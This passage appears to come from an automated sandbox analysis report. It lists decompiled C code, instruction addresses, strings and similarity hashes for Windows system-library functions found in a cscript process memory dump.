					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E054FAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L054D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E054FAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0553500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E054F9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x055351be
0x055351c3
0x055351c8
0x055351cd
0x055351d0
0x055351d3
0x055351d8
0x055351db
0x055351de
0x055351e0
0x055351e3
0x055351e6
0x055351e8
0x05535342
0x05535351
0x05535356
0x0553535a
0x05535360
0x05535363
0x05535366
0x05535369
0x05535369
0x0553536b
0x0553536b
0x05535370
0x055353a3
0x055353a4
0x055353a6
0x055353ab
0x055353ab
0x055353ae
0x055353ae
0x055353b5
0x055353bf
0x055353bf
0x05535375
0x05535396
0x055353a0
0x055353a0
0x00000000
0x05535396
0x05535377
0x05535379
0x0553537f
0x0553538c
0x05535390
0x00000000
0x05535390
0x055351ee
0x055351f1
0x05535301
0x05535310
0x05535315
0x05535318
0x0553531b
0x05535320
0x0553532e
0x05535331
0x00000000
0x05535331
0x05535328
0x05535329
0x00000000
0x05535329
0x055351fa
0x05535235
0x05535236
0x05535239
0x0553523f
0x05535240
0x05535241
0x05535242
0x05535246
0x05535247
0x0553524e
0x05535251
0x05535267
0x05535269
0x0553526e
0x0553527d
0x0553527e
0x05535281
0x05535282
0x05535287
0x05535288
0x0553528a
0x0553528f
0x05535294
0x00000000
0x00000000
0x0553529a
0x0553529c
0x0553529e
0x0553529e
0x055352a4
0x055352b0
0x00000000
0x00000000
0x055352ba
0x055352bc
0x055352bc
0x055352d4
0x055352d9
0x055352dc
0x055352e1
0x00000000
0x00000000
0x055352e7
0x055352f4
0x00000000
0x055352f4
0x05535270
0x00000000
0x05535270
0x055351fc
0x055351fd
0x05535202
0x05535203
0x05535205
0x0553520a
0x0553520f
0x00000000
0x00000000
0x0553521b
0x05535226
0x0553522b
0x0553521d
0x0553521d
0x05535222
0x05535222
0x0553522d
0x00000000

Strings

UEFI, xrefs: 0553521D
Legacy, xrefs: 05535226

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 96c1a82e167e6faf82b2b97a367f5907524df7f15cba34566a7a313e56b9a976
Instruction ID: 32a6ff87ea5c239cb25e2bfdd9398e7459ac0923f3bd87fea0df6e1ed6511650
Opcode Fuzzy Hash: 96c1a82e167e6faf82b2b97a367f5907524df7f15cba34566a7a313e56b9a976
Instruction Fuzzy Hash: 3F518DB1E046099FDB24DFA9D885BAEBBF9FF48700F14542EE909EB251E7719900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 054DB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E054DB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x55ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E054D7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E05588CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E054F9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E054FB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E054FCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E054D7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E05588F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E054FAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x55a8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x55a862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x55a8628; // 0x0
							_t116 =  *0x55a862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x054db94c
0x054db956
0x054db95c
0x054db95e
0x054db964
0x054db969
0x054db96d
0x054db96d
0x054db970
0x054db974
0x054db97a
0x054dbadf
0x054dbadf
0x054dbae2
0x054dbae4
0x054dbae6
0x054dbaf0
0x05522cb8
0x054dbaf6
0x054dbaf6
0x054dbaf6
0x054dbafd
0x054dbb1f
0x054dbb1f
0x054dbaff
0x054dbb00
0x054dbb00
0x054dbb03
0x054dbb03
0x054dbacb
0x054dbacf
0x054dbad0
0x054dbad1
0x054dbadc
0x054dbadc
0x054db980
0x054db980
0x054db988
0x054db98b
0x054db98d
0x054db990
0x054db993
0x054db999
0x054db99b
0x054db9a1
0x054db9a5
0x054db9aa
0x054db9b0
0x054db9bb
0x054db9c0
0x054db9c3
0x054db9ca
0x054db9cc
0x054db9cf
0x054db9d3
0x054db9d7
0x054dba94
0x054dba94
0x054dba98
0x054dbaa3
0x05522ccb
0x054dbaa9
0x054dbaa9
0x054dbaa9
0x054dbab1
0x05522cd5
0x05522cdd
0x05522cdd
0x054dbabb
0x054dbabc
0x054dbac2
0x054dbac3
0x054dbac3
0x054dbac6
0x00000000
0x054db9dd
0x054db9dd
0x054db9e7
0x054db9e7
0x054db9ec
0x054db9ec
0x054db9f1
0x054db9f5
0x054db9fa
0x054dba00
0x054dba0c
0x054dba10
0x054dba10
0x054dba12
0x054dba18
0x00000000
0x00000000
0x054dbb26
0x054dbb26
0x054dba1e
0x054dba1e
0x054dba23
0x054dba25
0x054dba2c
0x054dba30
0x054dba35
0x054dba35
0x054dba41
0x054dba46
0x054dba4c
0x054dba50
0x054dba54
0x054dba6a
0x054dba6e
0x054dba70
0x054dba74
0x054dba78
0x054dba7a
0x054dba7c
0x054dba8e
0x054dba90
0x054dba92
0x054dbb14
0x054dbb14
0x054dbb16
0x054dbb16
0x00000000
0x054dba7c
0x054dbb0a
0x054dbb0d
0x00000000
0x00000000
0x00000000
0x054dbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 054DB9A5

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 166d943448293ac1c8095de180d64a173d599fcaee743c620733d6e4b2249b0c
Instruction ID: 51c1e538687bea1d1f288fc647e9f202218d577b54c510456eba969d1004039d
Opcode Fuzzy Hash: 166d943448293ac1c8095de180d64a173d599fcaee743c620733d6e4b2249b0c
Instruction Fuzzy Hash: 89512471A083418FC720DF29C49496BFBE6FB88640F5589AFE58597354DB70E844CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 054BB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E054BB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x558f7a8);
				E0550D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0550D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E054FD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E054FF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0550DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E054FB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E054FB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E054FE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E054FA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x054bb171
0x054bb171
0x054bb171
0x054bb171
0x054bb171
0x054bb176
0x054bb17b
0x054bb180
0x054bb186
0x054bb18f
0x054bb198
0x054bb1a4
0x054bb1aa
0x05514802
0x05514802
0x05514805
0x0551480c
0x0551480e
0x054bb1d1
0x054bb1d3
0x054bb1de
0x054bb1de
0x05514817
0x0551481e
0x05514820
0x05514822
0x05514822
0x05514824
0x05514824
0x0551482a
0x00000000
0x00000000
0x05514835
0x0551483a
0x0551483d
0x0551483f
0x05514842
0x05514842
0x05514842
0x05514846
0x0551484c
0x0551484e
0x05514851
0x05514851
0x05514853
0x05514854
0x05514854
0x05514858
0x0551485a
0x0551485a
0x0551485d
0x0551485f
0x05514861
0x05514861
0x05514866
0x0551486b
0x0551486e
0x05514871
0x05514876
0x05514876
0x05514878
0x0551487b
0x05514884
0x05514884
0x00000000
0x0551487d
0x0551487d
0x05514882
0x05514889
0x05514889
0x0551488f
0x05514891
0x055148e0
0x055148e2
0x055148e4
0x055148e4
0x055148e7
0x055148e7
0x055148ed
0x055148f4
0x055148f6
0x05514951
0x05514951
0x05514953
0x05514953
0x05514956
0x05514956
0x05514958
0x05514959
0x05514959
0x0551495d
0x0551495d
0x0551495f
0x0551495f
0x05514965
0x05514969
0x055149ba
0x055149ba
0x055149c1
0x055149c5
0x055149cc
0x055149d4
0x055149d7
0x055149da
0x055149e4
0x055149e5
0x055149f3
0x05514a02
0x00000000
0x05514a02
0x05514972
0x05514974
0x00000000
0x00000000
0x05514976
0x05514979
0x05514982
0x05514983
0x05514984
0x0551498b
0x0551498d
0x05514991
0x05514993
0x05514999
0x0551499d
0x055149a2
0x055149a2
0x055149a2
0x05514999
0x055149ac
0x00000000
0x055149b3
0x055148f8
0x055148fe
0x00000000
0x00000000
0x00000000
0x055148fe
0x05514895
0x0551489c
0x055148ad
0x055148b2
0x055148b5
0x055148b7
0x055148ba
0x055148bc
0x055148c6
0x055148c6
0x055148cb
0x055148d1
0x055148d4
0x055148d8
0x055148d8
0x00000000
0x055148d8
0x055148be
0x055148c0
0x00000000
0x00000000
0x055148c2
0x00000000
0x00000000
0x00000000
0x055148c4
0x00000000
0x05514882
0x0551487b
0x05514904
0x05514906
0x00000000
0x00000000
0x05514908
0x0551490e
0x00000000
0x00000000
0x05514910
0x05514917
0x05514917
0x00000000
0x05514917
0x054bb1ba
0x055147f9
0x055147fc
0x00000000
0x00000000
0x00000000
0x055147fc
0x054bb1c0
0x054bb1c0
0x054bb1c3
0x054bb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 055148AD

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 20a7245e2e404139faa414dc9bb656ddc4e7a07a92979bc4960ab41e18903ad5
Instruction ID: 904954eb609e929524e51d8d6c2dc0204274897744e0a7f1276363b1b484cfc7
Opcode Fuzzy Hash: 20a7245e2e404139faa414dc9bb656ddc4e7a07a92979bc4960ab41e18903ad5
Instruction Fuzzy Hash: B251BD71E04259DBEF31CF688844BBEBFB1BF04710F2041AEDC5AAB281DB7449458B94

Uniqueness

Uniqueness Score: -1.00%

Function 054E2581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E054E2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t233;
				signed int _t237;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				signed int _t256;
				signed int _t263;
				signed int _t266;
				signed int _t274;
				intOrPtr _t280;
				signed int _t282;
				signed int _t284;
				void* _t285;
				signed int _t286;
				unsigned int _t289;
				signed int _t293;
				void* _t294;
				signed int _t295;
				signed int _t299;
				intOrPtr _t311;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t327;
				signed int _t328;
				void* _t332;
				void* _t333;
				void* _t335;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				void* _t342;

				_t338 = _t341;
				_t342 = _t341 - 0x4c;
				_v8 =  *0x55ad360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t327 = 0x55ab2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t289 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t280 = 0x48;
				_t309 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t320 = 0;
				_v37 = _t309;
				if(_v48 <= 0) {
					L16:
					_t45 = _t280 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t328 = 0xc0000106;
						goto L32;
					} else {
						_t327 = L054D4620(_t289,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t280);
						_v52 = _t327;
						__eflags = _t327;
						if(_t327 == 0) {
							_t328 = 0xc0000017;
							goto L32;
						} else {
							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
							_t50 = _t327 + 0x48; // 0x48
							_t322 = _t50;
							_t309 = _v32;
							 *((intOrPtr*)(_t327 + 0x3c)) = _t280;
							_t282 = 0;
							 *((short*)(_t327 + 0x30)) = _v48;
							__eflags = _t309;
							if(_t309 != 0) {
								 *(_t327 + 0x18) = _t322;
								__eflags = _t309 - 0x55a8478;
								 *_t327 = ((0 | _t309 == 0x055a8478) - 0x00000001 & 0xfffffffb) + 7;
								E054FF3E0(_t322,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
								_t309 = _v32;
								_t342 = _t342 + 0xc;
								_t282 = 1;
								__eflags = _a8;
								_t322 = _t322 + (( *_t309 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t274 = E055439F2(_t322);
									_t309 = _v32;
									_t322 = _t274;
								}
							}
							_t293 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t328 = _v68;
								__eflags = 0;
								 *((short*)(_t322 - 2)) = 0;
								goto L32;
							} else {
								_t284 = _t327 + _t282 * 4;
								_v56 = _t284;
								do {
									__eflags = _t309;
									if(_t309 != 0) {
										_t233 =  *(_v60 + _t293 * 4);
										__eflags = _t233;
										if(_t233 == 0) {
											goto L30;
										} else {
											__eflags = _t233 == 5;
											if(_t233 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t284 =  *(_v60 + _t293 * 4);
										 *(_t284 + 0x18) = _t322;
										_t237 =  *(_v60 + _t293 * 4);
										__eflags = _t237 - 8;
										if(_t237 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t237 * 4 +  &M054E2959))) {
												case 0:
													__ax =  *0x55a8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E054FF3E0(__edi,  *0x55a848c, __ax & 0x0000ffff);
														__eax =  *0x55a8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E054FF3E0(_t322, _v80, _v64);
													_t269 = _v64;
													goto L26;
												case 2:
													 *0x55a8480 & 0x0000ffff = E054FF3E0(__edi,  *0x55a8484,  *0x55a8480 & 0x0000ffff);
													__eax =  *0x55a8480 & 0x0000ffff;
													__eax = ( *0x55a8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E054FF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E054FF3E0(_t322, _v76, _v36);
														_t269 = _v36;
													}
													L26:
													_t342 = _t342 + 0xc;
													_t322 = _t322 + (_t269 >> 1) * 2 + 2;
													__eflags = _t322;
													L27:
													_push(0x3b);
													_pop(_t271);
													 *((short*)(_t322 - 2)) = _t271;
													goto L28;
												case 6:
													__ebx =  *0x55a575c;
													__eflags = __ebx - 0x55a575c;
													if(__ebx != 0x55a575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E054FF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x55a575c;
														} while (__ebx != 0x55a575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x55a8478 & 0x0000ffff = E054FF3E0(__edi,  *0x55a847c,  *0x55a8478 & 0x0000ffff);
													__eax =  *0x55a8478 & 0x0000ffff;
													__eax = ( *0x55a8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E055439F2(__ecx);
														__edi = __eax;
													}
